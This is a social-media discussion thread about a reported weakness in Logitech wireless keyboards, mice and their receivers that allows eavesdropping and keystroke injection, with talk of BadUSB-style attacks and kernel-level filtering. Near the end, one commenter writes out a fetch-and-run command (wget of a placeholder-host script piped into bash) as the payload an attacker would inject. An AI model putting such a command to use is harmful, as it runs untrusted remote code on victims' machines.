Wireless keyboards and mice vulnerable to eavesdropping and remote attacks.

(notice lack of "Logitech")

@Wolf480pl @fribbledom true, this isn't exactly news.

Maybe "*even* Logitech wireless HID are susceptible to eavesdropping and remote attacks"?

One word changes the meaning a lot, I think.

@RandomDamage @Wolf480pl

I still consider it news. The wireless connection is _supposed_ to be properly encrypted, after all. And until today most everyone was under the impression it is - at least when it comes to Logitech devices.

@fribbledom @RandomDamage
I've seen news of wireless keyboards with broken encryption several years ago.

Maybe it was just one vendor, but experience tells that any proprietary protocol that a vendor comes up with behind closed doors is very likely to be terribly broken. And wireless keyboards are supposed to be cheap, which only amplifies the effect.

In theory, it's possible to do it right, but the odds are so low...

@fribbledom @Wolf480pl it's at very minimum a useful reminder, so I'm really just slightly miffed with the headline writer for aiming low.

@fribbledom @RandomDamage @Wolf480pl I’ve *never* seen a Logi mouse encrypt squat. And the encryption used by any Logi keyboard I’ve owned is simplistic. Wireless devices are only secure within a Faraday cage, and those are nearly never used. Best to use wires unless you know what you’re doing or doing nothing useful or private at all.

@SuperFloppies @fribbledom @RandomDamage

I'd expect privacy leaks from a wireless mouse to be much less than from a wireless keyboard.

But then, there are also many other benefits to wired mice and keyboards. One of them is that you never need to replace batteries.

@Wolf480pl @SuperFloppies @fribbledom the trick is to hack the dongle and use it to sniff the bus (or even as a beach head into the system).

@RandomDamage @SuperFloppies @fribbledom

Can you sniff anything on USB other than your own traffic?

OTOH, if you could force a reconfiguration and add new interfaces to your device, like a keyboard and a mass storage, that could be plenty useful. But that requires an RCE on the dongle, and the dongle to have a powerful enough CPU that you can pull this off.

Sounds like effort.

@Wolf480pl @SuperFloppies @fribbledom deleted comment with link due to unexplained lag in posting.

Bad USB+ Rubber Duck HID and all bets are off. Just hope that Logitech (or whoever) remembers to guard against 3 year old exploits.

@fribbledom Shit. Guess I'm looking for a different mouse to get then.

@fribbledom All we have are these Logitech devices. LOL! There is no vulnerabilities! The problem is too vast and untenable. Everything is FIIIIIINE. **structural timbers on fire start to drop** ;)

@fribbledom If I only have a mouse, is it still possible to make it impersonate a keyboard?


You know that's a great question! I don't know the definitive answer, and could see arguments for both sides, but I'll boost your toot, in case someone else has more insight.

@mansr @fribbledom given that the exploit was shown working on a presenter device, which does not act as a keyboard and in fact has a filter in software to block any keystrokes sent

i would guess that it probably does

@mansr @fribbledom that's a good question and i don't know

however the article specifically mentions that there is a filter in place such that a device classified as a presenter should not be able to send letter keypresses, and this is bypassed in the exploit

@mansr @fribbledom With a lot of modern mice, yeah. My mouse shows up as a keyboard for the programmable functionally it has. Plus I'm pretty sure the Logitech dongles work for all their devices.

@mansr @fribbledom I am not sure, but probably yes. Logitech uses a single receiver for both keyboard and mouse.

@mansr @fribbledom The logitech mouse I have (which isn't even one of the fancy ones) can send keyboard commands using the side keys, even without the drivers running

@mansr @fribbledom if the USB controller is programmable, definitely. If it's not you are limited to what it is already programmed to pass.

This might include full keyboard, if the manufacturer is saving money by having a single part instead of using a limited mouse dongle.

@fribbledom Under Linux, the "unifying receiver" shows up as multiple input devices: Keyboard, Mouse, Consumer Control, and System Control. The mouse device reports only motion and button events. If only the mouse device is used by applications, one would think they might be shielded from injected keypress events. Or if not, modifying the kernel driver to discard non-mouse input from the receiver should be easy enough.


Sure, that doesn't mean it can automatically be exploited by sending some magic command to the mouse, though.

You're right though, it should be fairly trivial to block it in the kernel.

@fribbledom @mansr this is really a complete no brainier. They have no security at all. Just war drive around and wget 'https://myurl/script.sh'; bash script.sh or something similar. I always unplug these things immediately after using them.

This is why I never use wireless keyboards. Good old wires are far more reliable than any encryption scheme.
I remember reading a similar article on this - that wireless keyboard and mouse are vulnerable. Though that article mentioned that bluetooth keyboard and mice are not yet vulnerable.
Sign in to participate in the conversation

Server run by the main developers of the project 🐘 It is not focused on any particular niche interest - everyone is welcome as long as you follow our code of conduct!